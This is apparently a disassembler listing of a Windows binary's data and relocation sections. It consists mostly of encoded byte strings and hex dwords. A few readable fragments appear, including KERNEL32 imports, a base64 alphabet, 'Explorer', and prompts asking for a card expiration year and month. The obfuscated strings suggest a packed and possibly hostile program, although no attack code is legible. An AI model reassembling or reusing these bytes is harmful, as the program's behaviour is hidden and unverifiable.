aUuuusmajrrkndu db '㓑ㅂ',0
db 6
align 2
dw 1D4Eh
db 1Ah
db 0Fh, 1Ah, 7
db 0Dh
align 2
aKkqVx_0 db 'kkq-vx',0
aExplorer_0 db 'Explorer',0
db 9,0
db 45h ; E
db 1, 2Ah, 26h
a1 db 0Ah
db 27h,'/ &1',0
db 0Eh
db 0
db 5, 51h, 64h
aGrlkajrfidvv db 'gRlkajrFidvv',0
db 0Eh, 0, 9Eh
db 0D9h ;
db 0FBh, 0EAh, 0D2h
db 0F1h ;
db 0FDh, 0FFh, 0F2h
db 0FBh ;
db 0D7h, 0F0h, 0F8h
db 0F1h ;
db 0DFh, 0, 0Dh
db 0
db 0AEh, 0E9h, 0CBh
db 0DAh ;
db 0F8h, 0CBh, 0DCh
aIQ db '',0
db 14h
align 2
aTqxitpxirndnix db '={TQXiTPXiRnDNIXPiTPX',0
db 0Fh
align 2
aFZESG db 'ה',0
db 15h
db 0
aRzefPmxneiojpt db '',0
db 14h
align 2
dw 450Ch
aBxiCogihhioIai db 'bxi~`cogihHio~iaibx',0
db 14h
align 2
dw 0C089h
db 0E7h ;
db 0FDh, 0ECh, 0FBh
db 0E5h ;
db 0E6h, 0EAh, 0E2h
db 0ECh ;
db 0EDh, 0C0h, 0E7h
db 0EAh ;
db 0FBh, 0ECh, 0E4h
db 0ECh ;
db 0E7h, 0FDh, 0
db 13h
align 2
dw 0E4A3h
db 0C6h ;
db 0D7h, 0F0h, 0DAh
aCT db '',0
db 12h
db 0
db 6Ch, 2Bh, 9
db 18h
db 21h, 3, 8
db 19h
align 2
dw 2A09h
db 5
align 2
dw 2209h
db 0Dh
db 1, 9, 2Dh
db 0
db 0Ah, 0, 0DBh
aFlCopG db '',0
db 0Ch
db 0
aRgtebfenxfesb db '࣒',0
db 9,0
a0s_@ivyUq db '0s_@IvY\Uq',0
db 11h
align 2
a@bscntlaubbtwf db 7,'@bsCntlAubbTwfdbF',0
db 0Ch, 0, 5Ch
db 0Fh
db 39h, 28h, 19h
db 2Eh ; .
db 2Eh, 33h, 2Eh
db 11h
db 33h, 38h, 39h
db 0
db 11h, 0, 6Bh
db 2Ch ; ,
db 0Eh, 1Fh, 2Eh
db 13h
db 2, 1Fh, 28h
db 4
db 0Fh, 0Eh, 3Fh
db 3
db 19h, 0Eh, 0Ah
db 0Fh
align 2
dw 0Dh
db 16h
db 51h, 73h, 62h
db 52h ; R
db 64h, 7Fh, 60h
aSbofsw db 'sBofsW',0
db 9,0
db 55h, 13h, 3Ch
db 3Bh ; ;
db 31h, 16h, 39h
db 3Ah ; :
db 26h, 30h, 0
db 0Dh
align 2
aZsSSC db '',0
db 0Eh, 0, 64h
db 22h ; "
db 0Dh, 0Ah, 0
db 22h ; "
db 0Dh, 16h, 17h
db 10h
db 22h, 0Dh, 8
db 1
db 25h, 0, 0Ch
db 0
db 8Fh, 0C8h, 0EAh
db 0FBh ;
db 0DBh, 0E6h, 0ECh
db 0E4h ;
db 0CCh, 0E0h, 0FAh
db 0E1h ;
db 0FBh, 0, 0Dh
db 0
aFRiBclibilca db '䶐',0
db 0Dh,0
aIIpepiI db 'ܛ',0
db 9,0
db 64h
db 28h ; (
db 0Bh, 7, 5
db 8
db 22h, 16h, 1
db 1
align 2
dw 0Ah
db 79h ; y
db 35h, 16h, 1Ah
db 18h
db 15h, 38h, 15h
db 15h
db 16h, 1Ah, 0
db 0Bh
align 2
dw 491Fh
aVmkjSymzz db 'vmkj~sYmzz',0
db 0Ch
db 0
aUKsccvpvppma db '㵊',0
db 8,0
aXoknlcfo db 0Ah
db 'XoknLcfo',0
db 0Ch
dd 0F2D09700h, 0FAF2C3E3h, 0E3F6C7E7h, 1200D6FFh, 9E95D200h
dd 0BEB3B0BDh, 0BDBFB79Fh, 0A681ABA0h, 0A1A7A6B3h, 0D001300h
dd 79617840h, 79744F64h, 5A625968h, 4E686964h, 7F6C65h
dd 42150013h, 5670717Ch, 4167747Dh, 7960587Ah, 6C577C61h
dd 7007061h, 3B055200h, 372A173Ch, 80031h, 0ECEBF498h
dd 0F6FDF4EAh, 0B00CFh, 66775512h, 777E7B54h, 77687B41h
dd 5E000B00h, 2D31321Dh, 303F163Bh, 3B323Ah, 8FD80009h
dd 0BDACB1AAh, 0BDB4B19Eh, 0B5000E00h, 0F3C1D0E6h, 0E5D0D9DCh
dd 0C1DBDCDAh, 0B00C7D0h, 0F0D19500h, 0F0E1F0F9h, 0F0F9FCD3h
dd 0B00D4h, 0FEE9D89Bh, 0DDFEEFFAh, 0DAFEF7F2h, 5000C00h
dd 61646A49h, 77676C49h, 447C7764h, 0CE001000h, 83BAAB89h
dd 0A2BBAAA1h, 0A0AF86ABh, 8FABA2AAh, 0AD000400h, 0DDC8C8EFh
dd 83000A00h, 0F7EAFBC6h, 0E6F1EBD7h, 0B00E7E2h, 88BFED00h
dd 8281AE8Ah, 88A6889Eh, 100094h, 52506735h, 47504064h
dd 5954634Ch, 4D705040h, 0D0074h, 0E8EADD8Fh, 0E1EAFFC0h
dd 0CAF6EAC4h, 0C00CEF7h, 0F0F59400h, 0FDE4F5E2h, 0F0BAA6A7h
dd 0C00F8F8h, 5F5A3B00h, 524B5A4Dh, 5F150908h, 1005757h
dd 8FF300h, 1007C20h, 605A00h, 79590004h, 632C7Ch, 79050001h
dd 0DA000A00h, 959CE6FAh, 0FFE09788h, 0B00E4AFh, 0EBF7D700h
dd 9A968591h, 0A2F2ED92h, 0A00E9h, 0E29884A4h, 0E1E9E5F6h
dd 9AE99Eh, 400h, 4C002200h, 4F004300h, 4700h, 500h, 0CC00BA00h
dd 0D600DB00h, 0DF00CF00h, 2000000h, 0CCCCEC00h, 38000100h
dd 120017h, 52425C31h, 6E425D45h, 45504542h, 50534244h
dd 30243h, 5A0E000Eh, 67596C6Fh, 79616A60h, 7D6F624Dh
dd 12007Dh, 1B3075h, 6103118h, 51A011Eh, 111B1C22h, 6021Ah
dd 0D395000Dh, 0C2F1FBFCh, 0FAF1FBFCh, 0D4EDD0E2h, 91001000h
dd 0FFF0E3C5h, 0E5F0FDE2h, 0E2F4DCF4h, 0F4F6F0E2h, 4A000A00h
dd 3D252219h, 2E24231Dh, 0E003D25h, 0D7E1B200h, 0DCDBE5C6h
dd 0E6C5DDD6h, 0F3C6CAD7h, 67000E00h, 30130234h, 803090Eh
dd 9082B10h, 8002600h, 91A7F400h, 999DA080h, 8008691h
dd 9EA8FB00h, 9894BD8Fh, 0C00888Eh, 0C2F4A700h, 0C2EAC3C9h
dd 0C0C6D4D4h, 0E00E6C2h, 0B780D200h, 0A6A1BBB5h, 0BE91A0B7h
dd 93A1A1B3h, 69000A00h, 0C1F0624h, 0D07003Eh, 0B001E06h
dd 0D4FCB100h, 0D6D0C2C2h, 0C9DEF3D4h, 900F0h, 0CDC3E0ACh
dd 0C3CFE5C8h, 0B00EDC2h, 99BAF600h, 83B59297h, 84998584h
dd 0E00B7h, 0B7A684C3h, 0A7ADAA94h, 0A697B4ACh, 82B7BBh
dd 7E39000Dh, 506E4D5Ch, 4E565D57h, 4D5A5C6Bh, 9D000E00h
dd 0CAE9F8DAh, 0F2F9F3F4h, 0F3F2D1EAh, 900DCFAh, 0BB99DE00h
dd 0B0B789AAh, 0A9B1BAh, 4C0B000Bh, 6E467F6Eh, 6C6A7878h
dd 13004A6Eh, 23014600h, 34290032h, 29342123h, 11222833h
dd 2922282Fh, 0D0031h, 0EBFAD89Fh, 0ECFEF3DCh, 0F2FED1ECh
dd 1000DEFAh, 715C1800h, 6C79686Bh, 7D55707Bh, 7F796B6Bh
dd 0D00597Dh, 89A8EC00h, 839E989Fh, 8285BB95h, 9B8388h
dd 4B0F000Eh, 6658696Ah, 78606B61h, 6C607D5Fh, 0F004Eh
dd 0B8AF9EDDh, 8AB8A9BCh, 0B2B9B3B4h, 9CA598AAh, 0E2000F00h
dd 8E8E83A1h, 868C8BB5h, 90B2958Dh, 0A3818Dh, 87F2000Ah
dd 0C1809781h, 9E96DCC0h, 0A009Eh, 3F292F5Ah, 74686928h
dd 36363Eh, 4D680004h, 34520Bh, 9D0000h, 0D0A80001h, 0C4001700h
dd 2 dup(0A7E1A7E1h), 0E1A7E1E9h, 0E1A7E1A7h, 0EAA7E1A7h
dd 0A9ABA7h, 63460016h, 2 dup(63256325h), 25636B25h, 25632563h
dd 34682563h, 10033h, 4004519h, 47072900h, 1005A45h, 7D2100h
dd 255C7325h, 40073h, 5F702603h, 29h, 900h, 61000300h
dd 65006600h, 71006C00h, 46006600h, 67006D00h, 5A000000h
dd 84D1ED00h, 9ACD8A80h, 85998984h, 85CDDDD0h, 858A8488h
dd 0CDDDD099h, 899F828Fh, 0DDD09F88h, 8E9F9ECDh, 999985D0h
dd 0C2C2D79Dh, 85D29EC8h, 0CB9EC8D0h, 98C8D084h, 82CB9EC8h
dd 0CB98C8D0h, 8EC8D08Bh, 0D0849ECBh, 9ECB9EC8h, 98C8D082h
dd 0D08199CBh, 89CB98C8h, 0D39EC8D0h, 3F002C00h, 58525603h
dd 5B56481Fh, 0F02574Bh, 565A571Fh, 24B5758h, 505D1F0Fh
dd 4D5A5B4Dh, 4C1F0F02h, 1A025C4Dh, 5900104Ch, 15C1A02h
dd 5000700h, 393B6739h, 3B672Ah, 0EDC30005h, 0A2B7A2A7h
dd 27000000h, 1000400h, 59393124h, 0AC000400h, 0F49E8289h
dd 70000100h, 63250055h, 4D000100h, 30011h, 0B4E6B289h
dd 2C000400h, 11435F17h, 0D9000400h, 0F3E4BDE2h, 300h
dd 5A001300h, 54005E00h, 0F000000h, 54022700h, 4B41437Bh
dd 145D5202h, 4B430915h, 0F004Bh, 7287E5Bh, 2E7E3D30h
dd 69682137h, 37373F75h, 0F000400h, 53356C2Ah, 6A000400h
dd 19060444h, 0A4000100h, 900F8h, 160B2979h, 0D1A0C1Dh
dd 29001D30h, 0C9D58600h, 0C7D1D2C0h, 0CBDAC3D4h, 0E9F4E5EFh
dd 0F2E0E9F5h, 0E8EFD1DAh, 0F5F1E9E2h, 0F4F3C5DAh, 0F2E8E3F4h
dd 0F5F4E3D0h, 0E8E9EFh, 0BD930001h, 0A7000400h, 89FF828Ah
dd 0C3000300h, 9FF9A0h, 0C3E60008h, 93C3C893h, 93C3C8h
dd 47090002h, 2005Dh, 74152Ch, 7D39000Ch, 7E494A50h, 58694D5Ch
dd 54584Bh, 1A4C000Bh, 2D253E2Dh, 22053822h, 0C003825h
dd 0EFD88E00h, 0E0EFE7FCh, 0EBE2CDFAh, 0D00FCEFh, 0E1CB9800h
dd 0FDEADEEBh, 0EAECCBFDh, 0FFF6F1h, 580B000Eh, 674A7872h
dd 58686467h, 6562797Fh, 0C006Ch, 3B32315Eh, 6D2A2B3Fh
dd 323A706Ch, 0C0032h, 3E37345Bh, 682F2E3Ah, 373F7569h
dd 40037h, 44460628h, 1005Bh, 10005A06h, 253E6D00h, 2B19082Ah
dd 8090102h, 190C3D1Fh, 0B002C05h, 0D166500h, 56090900h
dd 9014B57h, 0B0009h, 0C3CED5A6h, 9495CACAh, 0CACAC288h
dd 4002A00h, 0EFEBEF00h, 0E00EFEFh, 0F9DB9C00h, 0F3E8CFE8h
dd 0FED3F7FFh, 0E8FFF9F6h, 47000B00h, 26223504h, 28012233h
dd 63329h, 93F40009h, 0C6C79D90h, 989890DAh, 14000900h
dd 277D7073h, 78703A26h, 10078h, 0F8D8h, 13000400h, 84BFEA00h
dd 8F86888Bh, 0CA859ECAh, 829E9F8Bh, 90839885h, 35008Fh
dd 0FBF4CF9Ah, 0BAFFF6F8h, 0FBBAF5EEh, 0F5F2EEEFh, 0FFE0F3E8h
dd 0D3BAB7BAh, 0C8D5D9D4h, 0CED9DFC8h, 0D4D3CABAh, 0F6CABAB4h
dd 0FFE9FBFFh, 0F5F9BAB6h, 0F9FFE8E8h, 100B4EEh, 614C00h
dd 61656C50h, 202C6573h, 656C6573h, 45207463h, 72697078h
dd 6F697461h, 6559206Eh, 1007261h, 7A5A00h, 61656C50h
dd 202C6573h, 656C6573h, 45207463h, 72697078h, 6F697461h
dd 6F4D206Eh, 68746Eh, 44434241h, 48474645h, 4C4B4A49h
dd 504F4E4Dh, 54535251h, 58575655h, 62615A59h, 66656463h
dd 6A696867h, 6E6D6C6Bh, 7271706Fh, 76757473h, 7A797877h
dd 33323130h, 37363534h, 2F2B3938h, 2F2F3A00h, 0A0597200h
dd 0CFF6A89Bh, 42A411h, 8F0AC9A0h, 4106E039h, 0D0399AFEh
dd 8CA411h, 8F0AC9A0h, 0A715A039h, 0D0658734h, 4A9211h
dd 0ACC7AF20h, 50F25B4Dh, 0CF98B530h, 82BB11h, 0CEBD00AAh
dd 96B2840Bh, 1ABAB4B1h, 9CB610h, 1D3400AAh, 2040007h
dd 0
dd 0C000h, 0
dd 2C442546h, 0D026CB33h, 83B411h, 1D94FC0h, 50F1FF19h
dd 0CF98B530h, 82BB11h, 0CEBD00AAh, 50F21F0Bh, 0CF98B530h
dd 82BB11h, 0CEBD00AAh, 50F1F70Bh, 0CF98B530h, 82BB11h
dd 0CEBD00AAh, 50F2400Bh, 0CF98B530h, 82BB11h, 0CEBD00AAh
dd 2C44270Bh, 0D026CB33h, 83B411h, 1D94FC0h, 0CB690019h
dd 0CF4D9585h, 0C9611h, 0EEF4C780h, 85h, 0
dd 0C000h, 0
dd 0C166146h, 0D0CDAFD3h, 3E8A11h, 0E2C94FC0h, 6Eh, 9Ch dup(0)
dd 1407000h, 2 dup(0)
dd 1418400h, 140AC00h, 1408400h, 2 dup(0)
dd 141A000h, 140C000h, 12h dup(0)
dd 140E800h, 140F800h, 1411400h, 2 dup(0)
dd 1412000h, 1412C00h, 1414000h, 1414C00h, 1415800h, 1416400h
dd 1416C00h, 1417800h, 2 dup(0)
dd 140E800h, 140F800h, 1411400h, 2 dup(0)
dd 1412000h, 1412C00h, 1414000h, 1414C00h, 1415800h, 1416400h
dd 1416C00h, 1417800h, 2 dup(0)
dd 45009B00h, 50746978h, 65636F72h, 7373h, 47012400h, 6E457465h
dd 6F726976h, 6E656D6Eh, 72745374h, 73676E69h, 41h, 52027800h
dd 6E556C74h, 646E6977h, 5F008000h, 706F6466h, 6E65h, 5F014F00h
dd 6E65706Fh, 66736F5Fh, 646E6168h, 656Ch, 66020D00h, 736F6C63h
dd 65h, 5F003900h, 69786563h, 74h, 6D024E00h, 6F6C6C61h
dd 63h, 72026000h, 65736961h, 73026700h, 75627465h, 66h
dd 73027500h, 70637274h, 79h, 52454B00h, 334C454Eh, 6C642E32h
dd 6Ch, 1400000h, 2 dup(1400010h), 54524310h, 2E4C4C44h
dd 4C4C44h, 1401400h, 7 dup(1401410h), 10h, 0Dh dup(0)
dd 2000h, 0
dd 2000h, 100000h, 0BE0000h, 0C00000h, 0F60000h, 78h dup(0)
dd 100000h, 1F000h, 8C303100h, 0FD30F330h, 13310530h, 21311931h
dd 0B6312731h, 0FC31EF31h, 0E320131h, 23321332h, 3E322932h
dd 2832B432h, 33332E33h, 0A3338A33h, 0BF33B933h, 0EE33D833h
dd 0FF33F433h, 1A340933h, 3E343134h, 77344C34h, 82347D34h
dd 95348F34h, 0A1349B34h, 0E234BF34h, 0ED34E834h, 534F434h
dd 17350B35h, 2A352235h, 44353E35h, 61354E35h, 98357535h
dd 0A3359E35h, 0B735A935h, 0C935C335h, 0DC35D435h, 0F635F035h
dd 13360035h, 4A362736h, 57365036h, 6B365D36h, 95368E36h
dd 0AD36A736h, 236FC36h, 0AF377637h, 0C037BB37h, 0DB37D037h
dd 0F537E137h, 1937FA37h, 33381F38h, 43383938h, 6A385638h
dd 84387E38h, 0AA389138h, 0C438B038h, 0E238CB38h, 338FD38h
dd 34391939h, 4D393A39h, 6E396839h, 9C398139h, 0AA39A239h
dd 0DC39CF39h, 0F639EA39h, 139FB39h, 213A143Ah, 2F3A263Ah
dd 413A3C3Ah, 523A463Ah, 5D3A583Ah, 713A623Ah, 7C3A773Ah
dd 8C3A863Ah, 0A83A913Ah, 0BF3AAE3Ah, 0E53AD23Ah, 0FD3AEC3Ah
dd 173B033Ah, 303B233Bh, 483B353Bh, 5F3B4F3Bh, 7B3B6C3Bh
dd 8A3B843Bh, 0C83BC03Bh, 93BFD3Bh, 263C1E3Ch, 6C3C553Ch
dd 7E3C753Ch, 0A93C973Ch, 0B93CB23Ch, 0E83CC03Ch, 43CFE3Ch
dd 243D163Dh, 4F3D483Dh, 693D5C3Dh, 773D6E3Dh, 893D843Dh
dd 9B3D8E3Dh, 0A63DA13Dh, 0D63DC53Dh, 0FD3DE93Dh, 153E023Dh
dd 273E213Eh, 4A3E343Eh, 633E563Eh, 893E793Eh, 9E3E8F3Eh
dd 0B03EAB3Eh, 0C93EC03Eh, 0E63ED93Eh, 0F43EEB3Eh, 63F013Eh
dd 173F0B3Fh, 223F1D3Fh, 333F273Fh, 3E3F393Fh, 4F3F433Fh
dd 5A3F553Fh, 6B3F5F3Fh, 763F713Fh, 8A3F7B3Fh, 953F903Fh
dd 0A43F9F3Fh, 0E73FD93Fh, 3FF43Fh, 200000h, 1EC00h, 12300500h
dd 3F301A30h, 52304D30h, 8B305D30h, 0A9309030h, 0C830B730h
dd 0E530D730h, 0F730EA30h, 16310630h, 56315031h, 9C316F31h
dd 0C031AD31h, 0D931D431h, 0FF31EC31h, 1B320531h, 50322B32h
dd 75325732h, 9A328132h, 0CA32B132h, 0F032E032h, 11330632h
dd 2A332333h, 64335E33h, 7F337733h, 0F833EC33h, 0D33FE33h
dd 1E341834h, 3A342C34h, 4C344034h, 6C345A34h, 80347234h
dd 90348A34h, 0A5349C34h, 0B434AB34h, 0E334D234h, 0A34F534h
dd 1D351135h, 49354435h, 66355535h, 71356C35h, 8D357C35h
dd 99359335h, 0A4359E35h, 0AF35A935h, 0B935B435h, 0CC35C335h
dd 0DC35D735h, 0E735E235h, 0F235ED35h, 0FD35F835h, 8360335h
dd 1F361436h, 2A362436h, 3D363636h, 4F364936h, 63365C36h
dd 78367136h, 85367D36h, 93368C36h, 0B4369A36h, 0D136BA36h
dd 0F936DA36h, 8370136h, 1D370E37h, 2D372637h, 4A373337h
dd 63375637h, 71376937h, 0A4379737h, 0E137CA37h, 1637F737h
dd 35381D38h, 86388038h, 0BA38A438h, 0C390338h, 28392239h
dd 83396D39h, 0A2399739h, 0C539A939h, 0E439D239h, 0F539EF39h
dd 133A0D39h, 4E3A483Ah, 773A6C3Ah, 0A23A823Ah, 0DF3AA83Ah
dd 33AE53Ah, 213B0F3Bh, 4E3B3E3Bh, 663B573Bh, 853B723Bh
dd 0AD3B923Bh, 0BD3BB73Bh, 0CF3BC93Bh, 0F23BD53Bh, 143C003Bh
dd 403C323Ch, 713C623Ch, 8C3C763Ch, 0A13C923Ch, 0C53CA83Ch
dd 0D73CD03Ch, 0F73CEE3Ch, 163D063Ch, 3C3D313Dh, 4F3D423Dh
dd 5C3D553Dh, 8D3D693Dh, 373DC93Dh, 533E483Eh, 903E663Eh
dd 0B13EA63Eh, 0CA3EC23Eh, 0DB3ED53Eh, 0C3EFB3Eh, 243F173Fh
dd 603F2B3Fh, 8A3F683Fh, 9E3F943Fh, 0B03FAB3Fh, 0D33FC53Fh
dd 30003Fh, 14400h, 7300000h, 14300D30h, 57305230h, 74306A30h
dd 0B630B030h, 0D630CF30h, 0F630EF30h, 16310F30h, 47314131h
dd 65314C31h, 85317D31h, 0A1319B31h, 0C931BF31h, 0D531CF31h
dd 0EB31DF31h, 131F131h, 2C322532h, 5F324232h, 76326632h
dd 0C432AF32h, 0E332D632h, 0FE32F732h, 1D331332h, 58332D33h
dd 73336A33h, 0B433A933h, 0CF33BD33h, 533EF33h, 6D342334h
dd 8F347434h, 8349C34h, 3F350F35h, 52354C35h, 68356235h
dd 5E357635h, 9A368636h, 0B436A036h, 8036C236h, 0B2378737h
dd 0F137E737h, 4437F837h, 56384A38h, 76386738h, 8D387C38h
dd 0A7389438h, 2038B638h, 8D394239h, 573A1239h, 833A7D3Ah
dd 0F13AE43Ah, 243AF63Ah, 3A3B303Bh, 4C3B443Bh, 623B523Bh
dd 9C3B913Bh, 0C03BBA3Bh, 0E13BC73Bh, 0A3BF83Bh, 3F3C393Ch
dd 753C463Ch, 8C3C7E3Ch, 0DD3CD03Ch, 0D3CF83Ch, 523D133Dh
dd 633D583Dh, 0D53DCF3Dh, 0EA3DE33Dh, 3DFA3Dh, 293E1E3Eh
dd 3F3E373Eh, 693E633Eh, 7F3E793Eh, 0A23E8D3Eh, 0CC3EC53Eh
dd 0E23ED23Eh, 3E3F383Eh, 773F6C3Fh, 0E93FB63Fh, 3FF03Fh
dd 400000h, 18400h, 6B306500h, 0AB308630h, 0DC30C330h
dd 0FD30E230h, 1C311630h, 30312A31h, 0A1319B31h, 0DE31D831h
dd 6B326531h, 80327A32h, 0E6328E32h, 9032EC32h, 0B0339B33h
dd 0CB33B633h, 0EE33D133h, 833F533h, 2B341F34h, 47343134h
dd 8B344E34h, 0B234A134h, 0D934BB34h, 0F334E534h, 16350434h
dd 37352835h, 5A354935h, 9D356435h, 0C435B335h, 0D935CB35h
dd 22361235h, 47364136h, 67366036h, 96368236h, 0AC369D36h
dd 0C836B236h, 0F536E936h, 1036FE36h, 30371D37h, 75373937h
dd 8A377B37h, 9A379237h, 737A237h, 29382438h, 4B382F38h
dd 68385738h, 80387A38h, 90388938h, 9B389638h, 0BC38B638h
dd 0FB38EF38h, 1F391138h, 37393139h, 63394339h, 92398839h
dd 0B539A839h, 0E839E239h, 193A0339h, 303A293Ah, 433A3E3Ah
dd 643A523Ah, 953A893Ah, 0C43ABC3Ah, 0F13ADA3Ah, 43AFE3Ah
dd 273B163Bh, 3C3B323Bh, 6D3B513Bh, 0B13B7A3Bh, 0BC3BB63Bh
dd 0E73BD13Bh, 93BF43Bh, 1E3C153Ch, 3C3C273Ch, 543C4D3Ch
dd 6A3C613Ch, 8D3C743Ch, 0A53C9C3Ch, 0FC3CB23Ch, 463D093Ch
dd 713D643Dh, 0B33DAA3Dh, 0C03DBA3Dh, 0E13DC53Dh, 393E283Dh
dd 603E4C3Eh, 783E653Eh, 883E823Eh, 0AB3EA43Eh, 0D33EC33Eh
dd 0EA3EE33Eh, 293F233Eh, 473F363Fh, 5D3F4E3Fh, 7C3F643Fh
dd 0B03FA33Fh, 0BE3FB73Fh, 50003Fh, 28400h, 10300600h
dd 3C301B30h, 67305430h, 86308030h, 0A5309C30h, 1530FF30h
dd 31311B31h, 55313F31h, 6A316431h, 8F318031h, 0A731A231h
dd 0DB31AE31h, 631F331h, 32321E32h, 50323832h, 0B1327A32h
dd 0E832BA32h, 3E331F32h, 7C336933h, 0C233B833h, 1C33FE33h
dd 2C342334h, 3A343434h, 50344634h, 78346034h, 8C347F34h
dd 0A3349434h, 0BA34B334h, 0D534C134h, 0FE34EF34h, 0A350534h
dd 23351C35h, 33352C35h, 43353D35h, 5B354935h, 72356335h
dd 8C357F35h, 0AC359735h, 0B935B335h, 0E335C835h, 0F635EC35h
dd 7360035h, 18361236h, 33362C36h, 5F363E36h, 94368136h
dd 0B0369B36h, 0C936BC36h, 0E136D236h, 0F836ED36h, 15370B36h
dd 35372937h, 59374137h, 6A375F37h, 8B378537h, 0B837AD37h
dd 0E237D837h, 0F237EC37h, 32380A37h, 4C384238h, 5C385238h
dd 6D386238h, 85387E38h, 0CD38B538h, 0DD38D338h, 0F338E238h
dd 538FD38h, 1C390B39h, 32392239h, 3F393839h, 63394A39h
dd 78397139h, 91398439h, 0B139AB39h, 0C839BF39h, 0DB39D239h
dd 0F039E539h, 0FE39F839h, 0A3A0439h, 1D3A163Ah, 383A2E3Ah
dd 603A533Ah, 6E3A653Ah, 803A7B3Ah, 913A853Ah
dd 9C3A973Ah, 0AD3AA13Ah, 0B83AB33Ah, 0C93ABD3Ah, 0D43ACF3Ah
dd 0E53AD93Ah, 0F03AEB3Ah, 13AF53Ah, 0C3B073Bh, 1D3B113Bh
dd 283B233Bh, 393B2D3Bh, 443B3F3Bh, 553B493Bh, 603B5B3Bh
dd 713B653Bh, 7C3B773Bh, 8D3B813Bh, 983B933Bh, 0A93B9D3Bh
dd 0B43BAF3Bh, 0C53BB93Bh, 0D03BCB3Bh, 0E13BD53Bh, 0EC3BE73Bh
dd 0FD3BF13Bh, 83C033Bh, 193C0D3Ch, 243C1F3Ch, 353C293Ch
dd 403C3B3Ch, 513C453Ch, 5C3C573Ch, 6D3C613Ch, 783C733Ch
dd 893C7D3Ch, 943C8F3Ch, 0A53C993Ch, 0B03CAB3Ch, 0C13CB53Ch
dd 0CC3CC73Ch, 0DD3CD13Ch, 0E83CE33Ch, 0F93CED3Ch, 43CFF3Ch
dd 153D093Dh, 203D1B3Dh, 313D253Dh, 3C3D373Dh, 503D413Dh
dd 5B3D563Dh, 7B3D753Dh, 953D8B3Dh, 0A83D9A3Dh, 0C33DBA3Dh
dd 0DE3DCC3Dh, 0F33DEA3Dh, 43DFD3Dh, 243E183Eh, 373E2D3Eh
dd 4D3E433Eh, 603E5B3Eh, 0C53EB13Eh, 0E53ED33Eh, 33EFC3Eh
dd 193F123Fh, 3F3F2E3Fh, 693F453Fh, 7E3F733Fh, 0A53F8A3Fh
dd 0C13FB43Fh, 0E33FCE3Fh, 0F13FEB3Fh, 3FF73Fh, 600000h
dd 18400h, 0B300100h, 3B302530h, 51304B30h, 7C305830h
dd 9E308230h, 0B130A530h, 0C430BE30h, 0D830CD30h, 330DE30h
dd 1F311831h, 37312E31h, 77315E31h, 0CF319C31h, 3F321731h
dd 5F324632h, 9B327632h, 0C632C032h, 0DC32D632h, 0F832EC32h
dd 12330332h, 46334033h, 71336A33h, 96338333h, 0F733D933h
dd 2833FE33h, 62342E34h, 94346934h, 0C134AD34h, 0E434DE34h
dd 2034F634h, 6E352635h, 84357435h, 0B1359D35h, 0DE35C735h
dd 0C360635h, 46364136h, 6E364D36h, 84367836h, 9E368D36h
dd 0DA36D436h, 13370636h, 2D371F37h, 58373337h, 8D376137h
dd 0C937B737h, 0F737DC37h, 2A380637h, 54383038h, 7C385A38h
dd 0AE388F38h, 0D038B438h, 0F838D738h, 0E390238h, 28391739h
dd 3F393239h, 5A394539h, 97396839h, 0C439B739h, 0E539D839h
dd 239F939h, 5B3A0C3Ah, 0B93A903Ah, 0D63AD03Ah, 0A3AFD3Ah
dd 243B1C3Bh, 813B7A3Bh, 0B83BA13Bh, 0D83BBF3Bh, 113BDF3Bh
dd 1D3C173Ch, 583C513Ch, 6E3C673Ch, 0B93C9C3Ch, 0C53CBF3Ch
dd 0C3D073Ch, 393D253Dh, 523D4D3Dh, 793D653Dh, 0D83DD13Dh
dd 0F33DE63Dh, 0C3E073Dh, 5F3E1F3Eh, 783E6C3Eh, 0D73EBD3Eh
dd 0F23EE23Eh, 0FC3EF73Eh, 0B3F053Eh, 1B3F143Fh, 403F313Fh
dd 523F463Fh, 6D3F593Fh, 0A33F733Fh, 0C03FB13Fh, 0DB3FD43Fh
dd 0FC3FEA3Fh, 70003Fh, 29C00h, 19301200h, 75302B30h, 0A6308730h
dd 0C130AF30h, 0D630CA30h, 0F430ED30h, 14310D30h, 34312D31h
dd 6A315D31h, 78316F31h, 8A318531h, 9B318F31h, 0A631A131h
dd 0B731AB31h, 0C231BD31h, 0D631C731h, 0E131DC31h, 0E31EF31h
dd 1C321532h, 27322232h, 5E325832h, 80327932h, 0B3329B32h
dd 0D232B932h, 1B32EA32h, 52333533h, 68336233h, 9E339033h
dd 0C833B333h, 0E833D633h, 0E33FD33h, 65345934h, 70346B34h
dd 81347534h, 8C348734h, 9D349134h, 0A834A334h, 0B934AD34h
dd 0C434BF34h, 0D534C934h, 0E034DB34h, 0F134E534h, 0FC34F734h
dd 0D350134h, 18351335h, 29351D35h, 34352F35h, 45353935h
dd 50354B35h, 61355535h, 6C356735h, 7D357135h, 88358335h
dd 99358D35h, 0A4359F35h, 0B535A935h, 0C035BB35h, 0D135C535h
dd 0DC35D735h, 0ED35E135h, 0F835F335h, 935FD35h, 14360F36h
dd 25361936h, 30362B36h, 41363536h, 4C364736h, 5D365136h
dd 68366336h, 79366D36h, 84367F36h, 95368936h, 0A0369B36h
dd 0B136A536h, 0BC36B736h, 0CD36C136h, 0D836D336h, 0E936DD36h
dd 0F436EF36h, 536F936h, 10370B37h, 21371537h, 2C372737h
dd 3D373137h, 48374337h, 59374D37h, 64375F37h, 75376937h
dd 80377B37h, 91378537h, 9C379737h, 0AD37A137h, 0B837B337h
dd 0C937BD37h, 0D437CF37h, 0E537D937h, 0F037EB37h, 137F537h
dd 0C380738h, 1D381138h, 28382338h, 39382D38h, 44383F38h
dd 55384938h, 60385B38h, 71386538h, 7C387738h, 8D388138h
dd 98389338h, 0A9389D38h, 0B438AF38h, 0C538B938h, 0D038CB38h
dd 0E138D538h, 0EC38E738h, 338F138h, 0E390939h, 1F391939h
dd 2B392539h, 3C393439h, 60395439h, 8A396E39h, 0A3399139h
dd 0C939BE39h, 0FE39E439h, 463A1B39h, 873A4C3Ah, 993A8D3Ah
dd 0B53AA13Ah, 0D23ABC3Ah, 0ED3AD83Ah, 83B023Ah, 3B3B343Bh
dd 613B5B3Bh, 7F3B753Bh, 0C93BA83Bh, 0DF3BCF3Bh, 0F13BEC3Bh
dd 173BFD3Bh, 423C233Ch, 593C493Ch, 863C623Ch, 0B23C8C3Ch
dd 2D3CF23Ch, 7A3D333Dh, 9A3D803Dh, 0DC3DA03Dh, 0F73DE23Dh
dd 103DFD3Dh, 293E233Eh, 423E3C3Eh, 5E3E553Eh, 803E793Eh
dd 0B23EAC3Eh, 0E83EE23Eh, 73EF43Eh, 2E3F1A3Fh, 483F423Fh
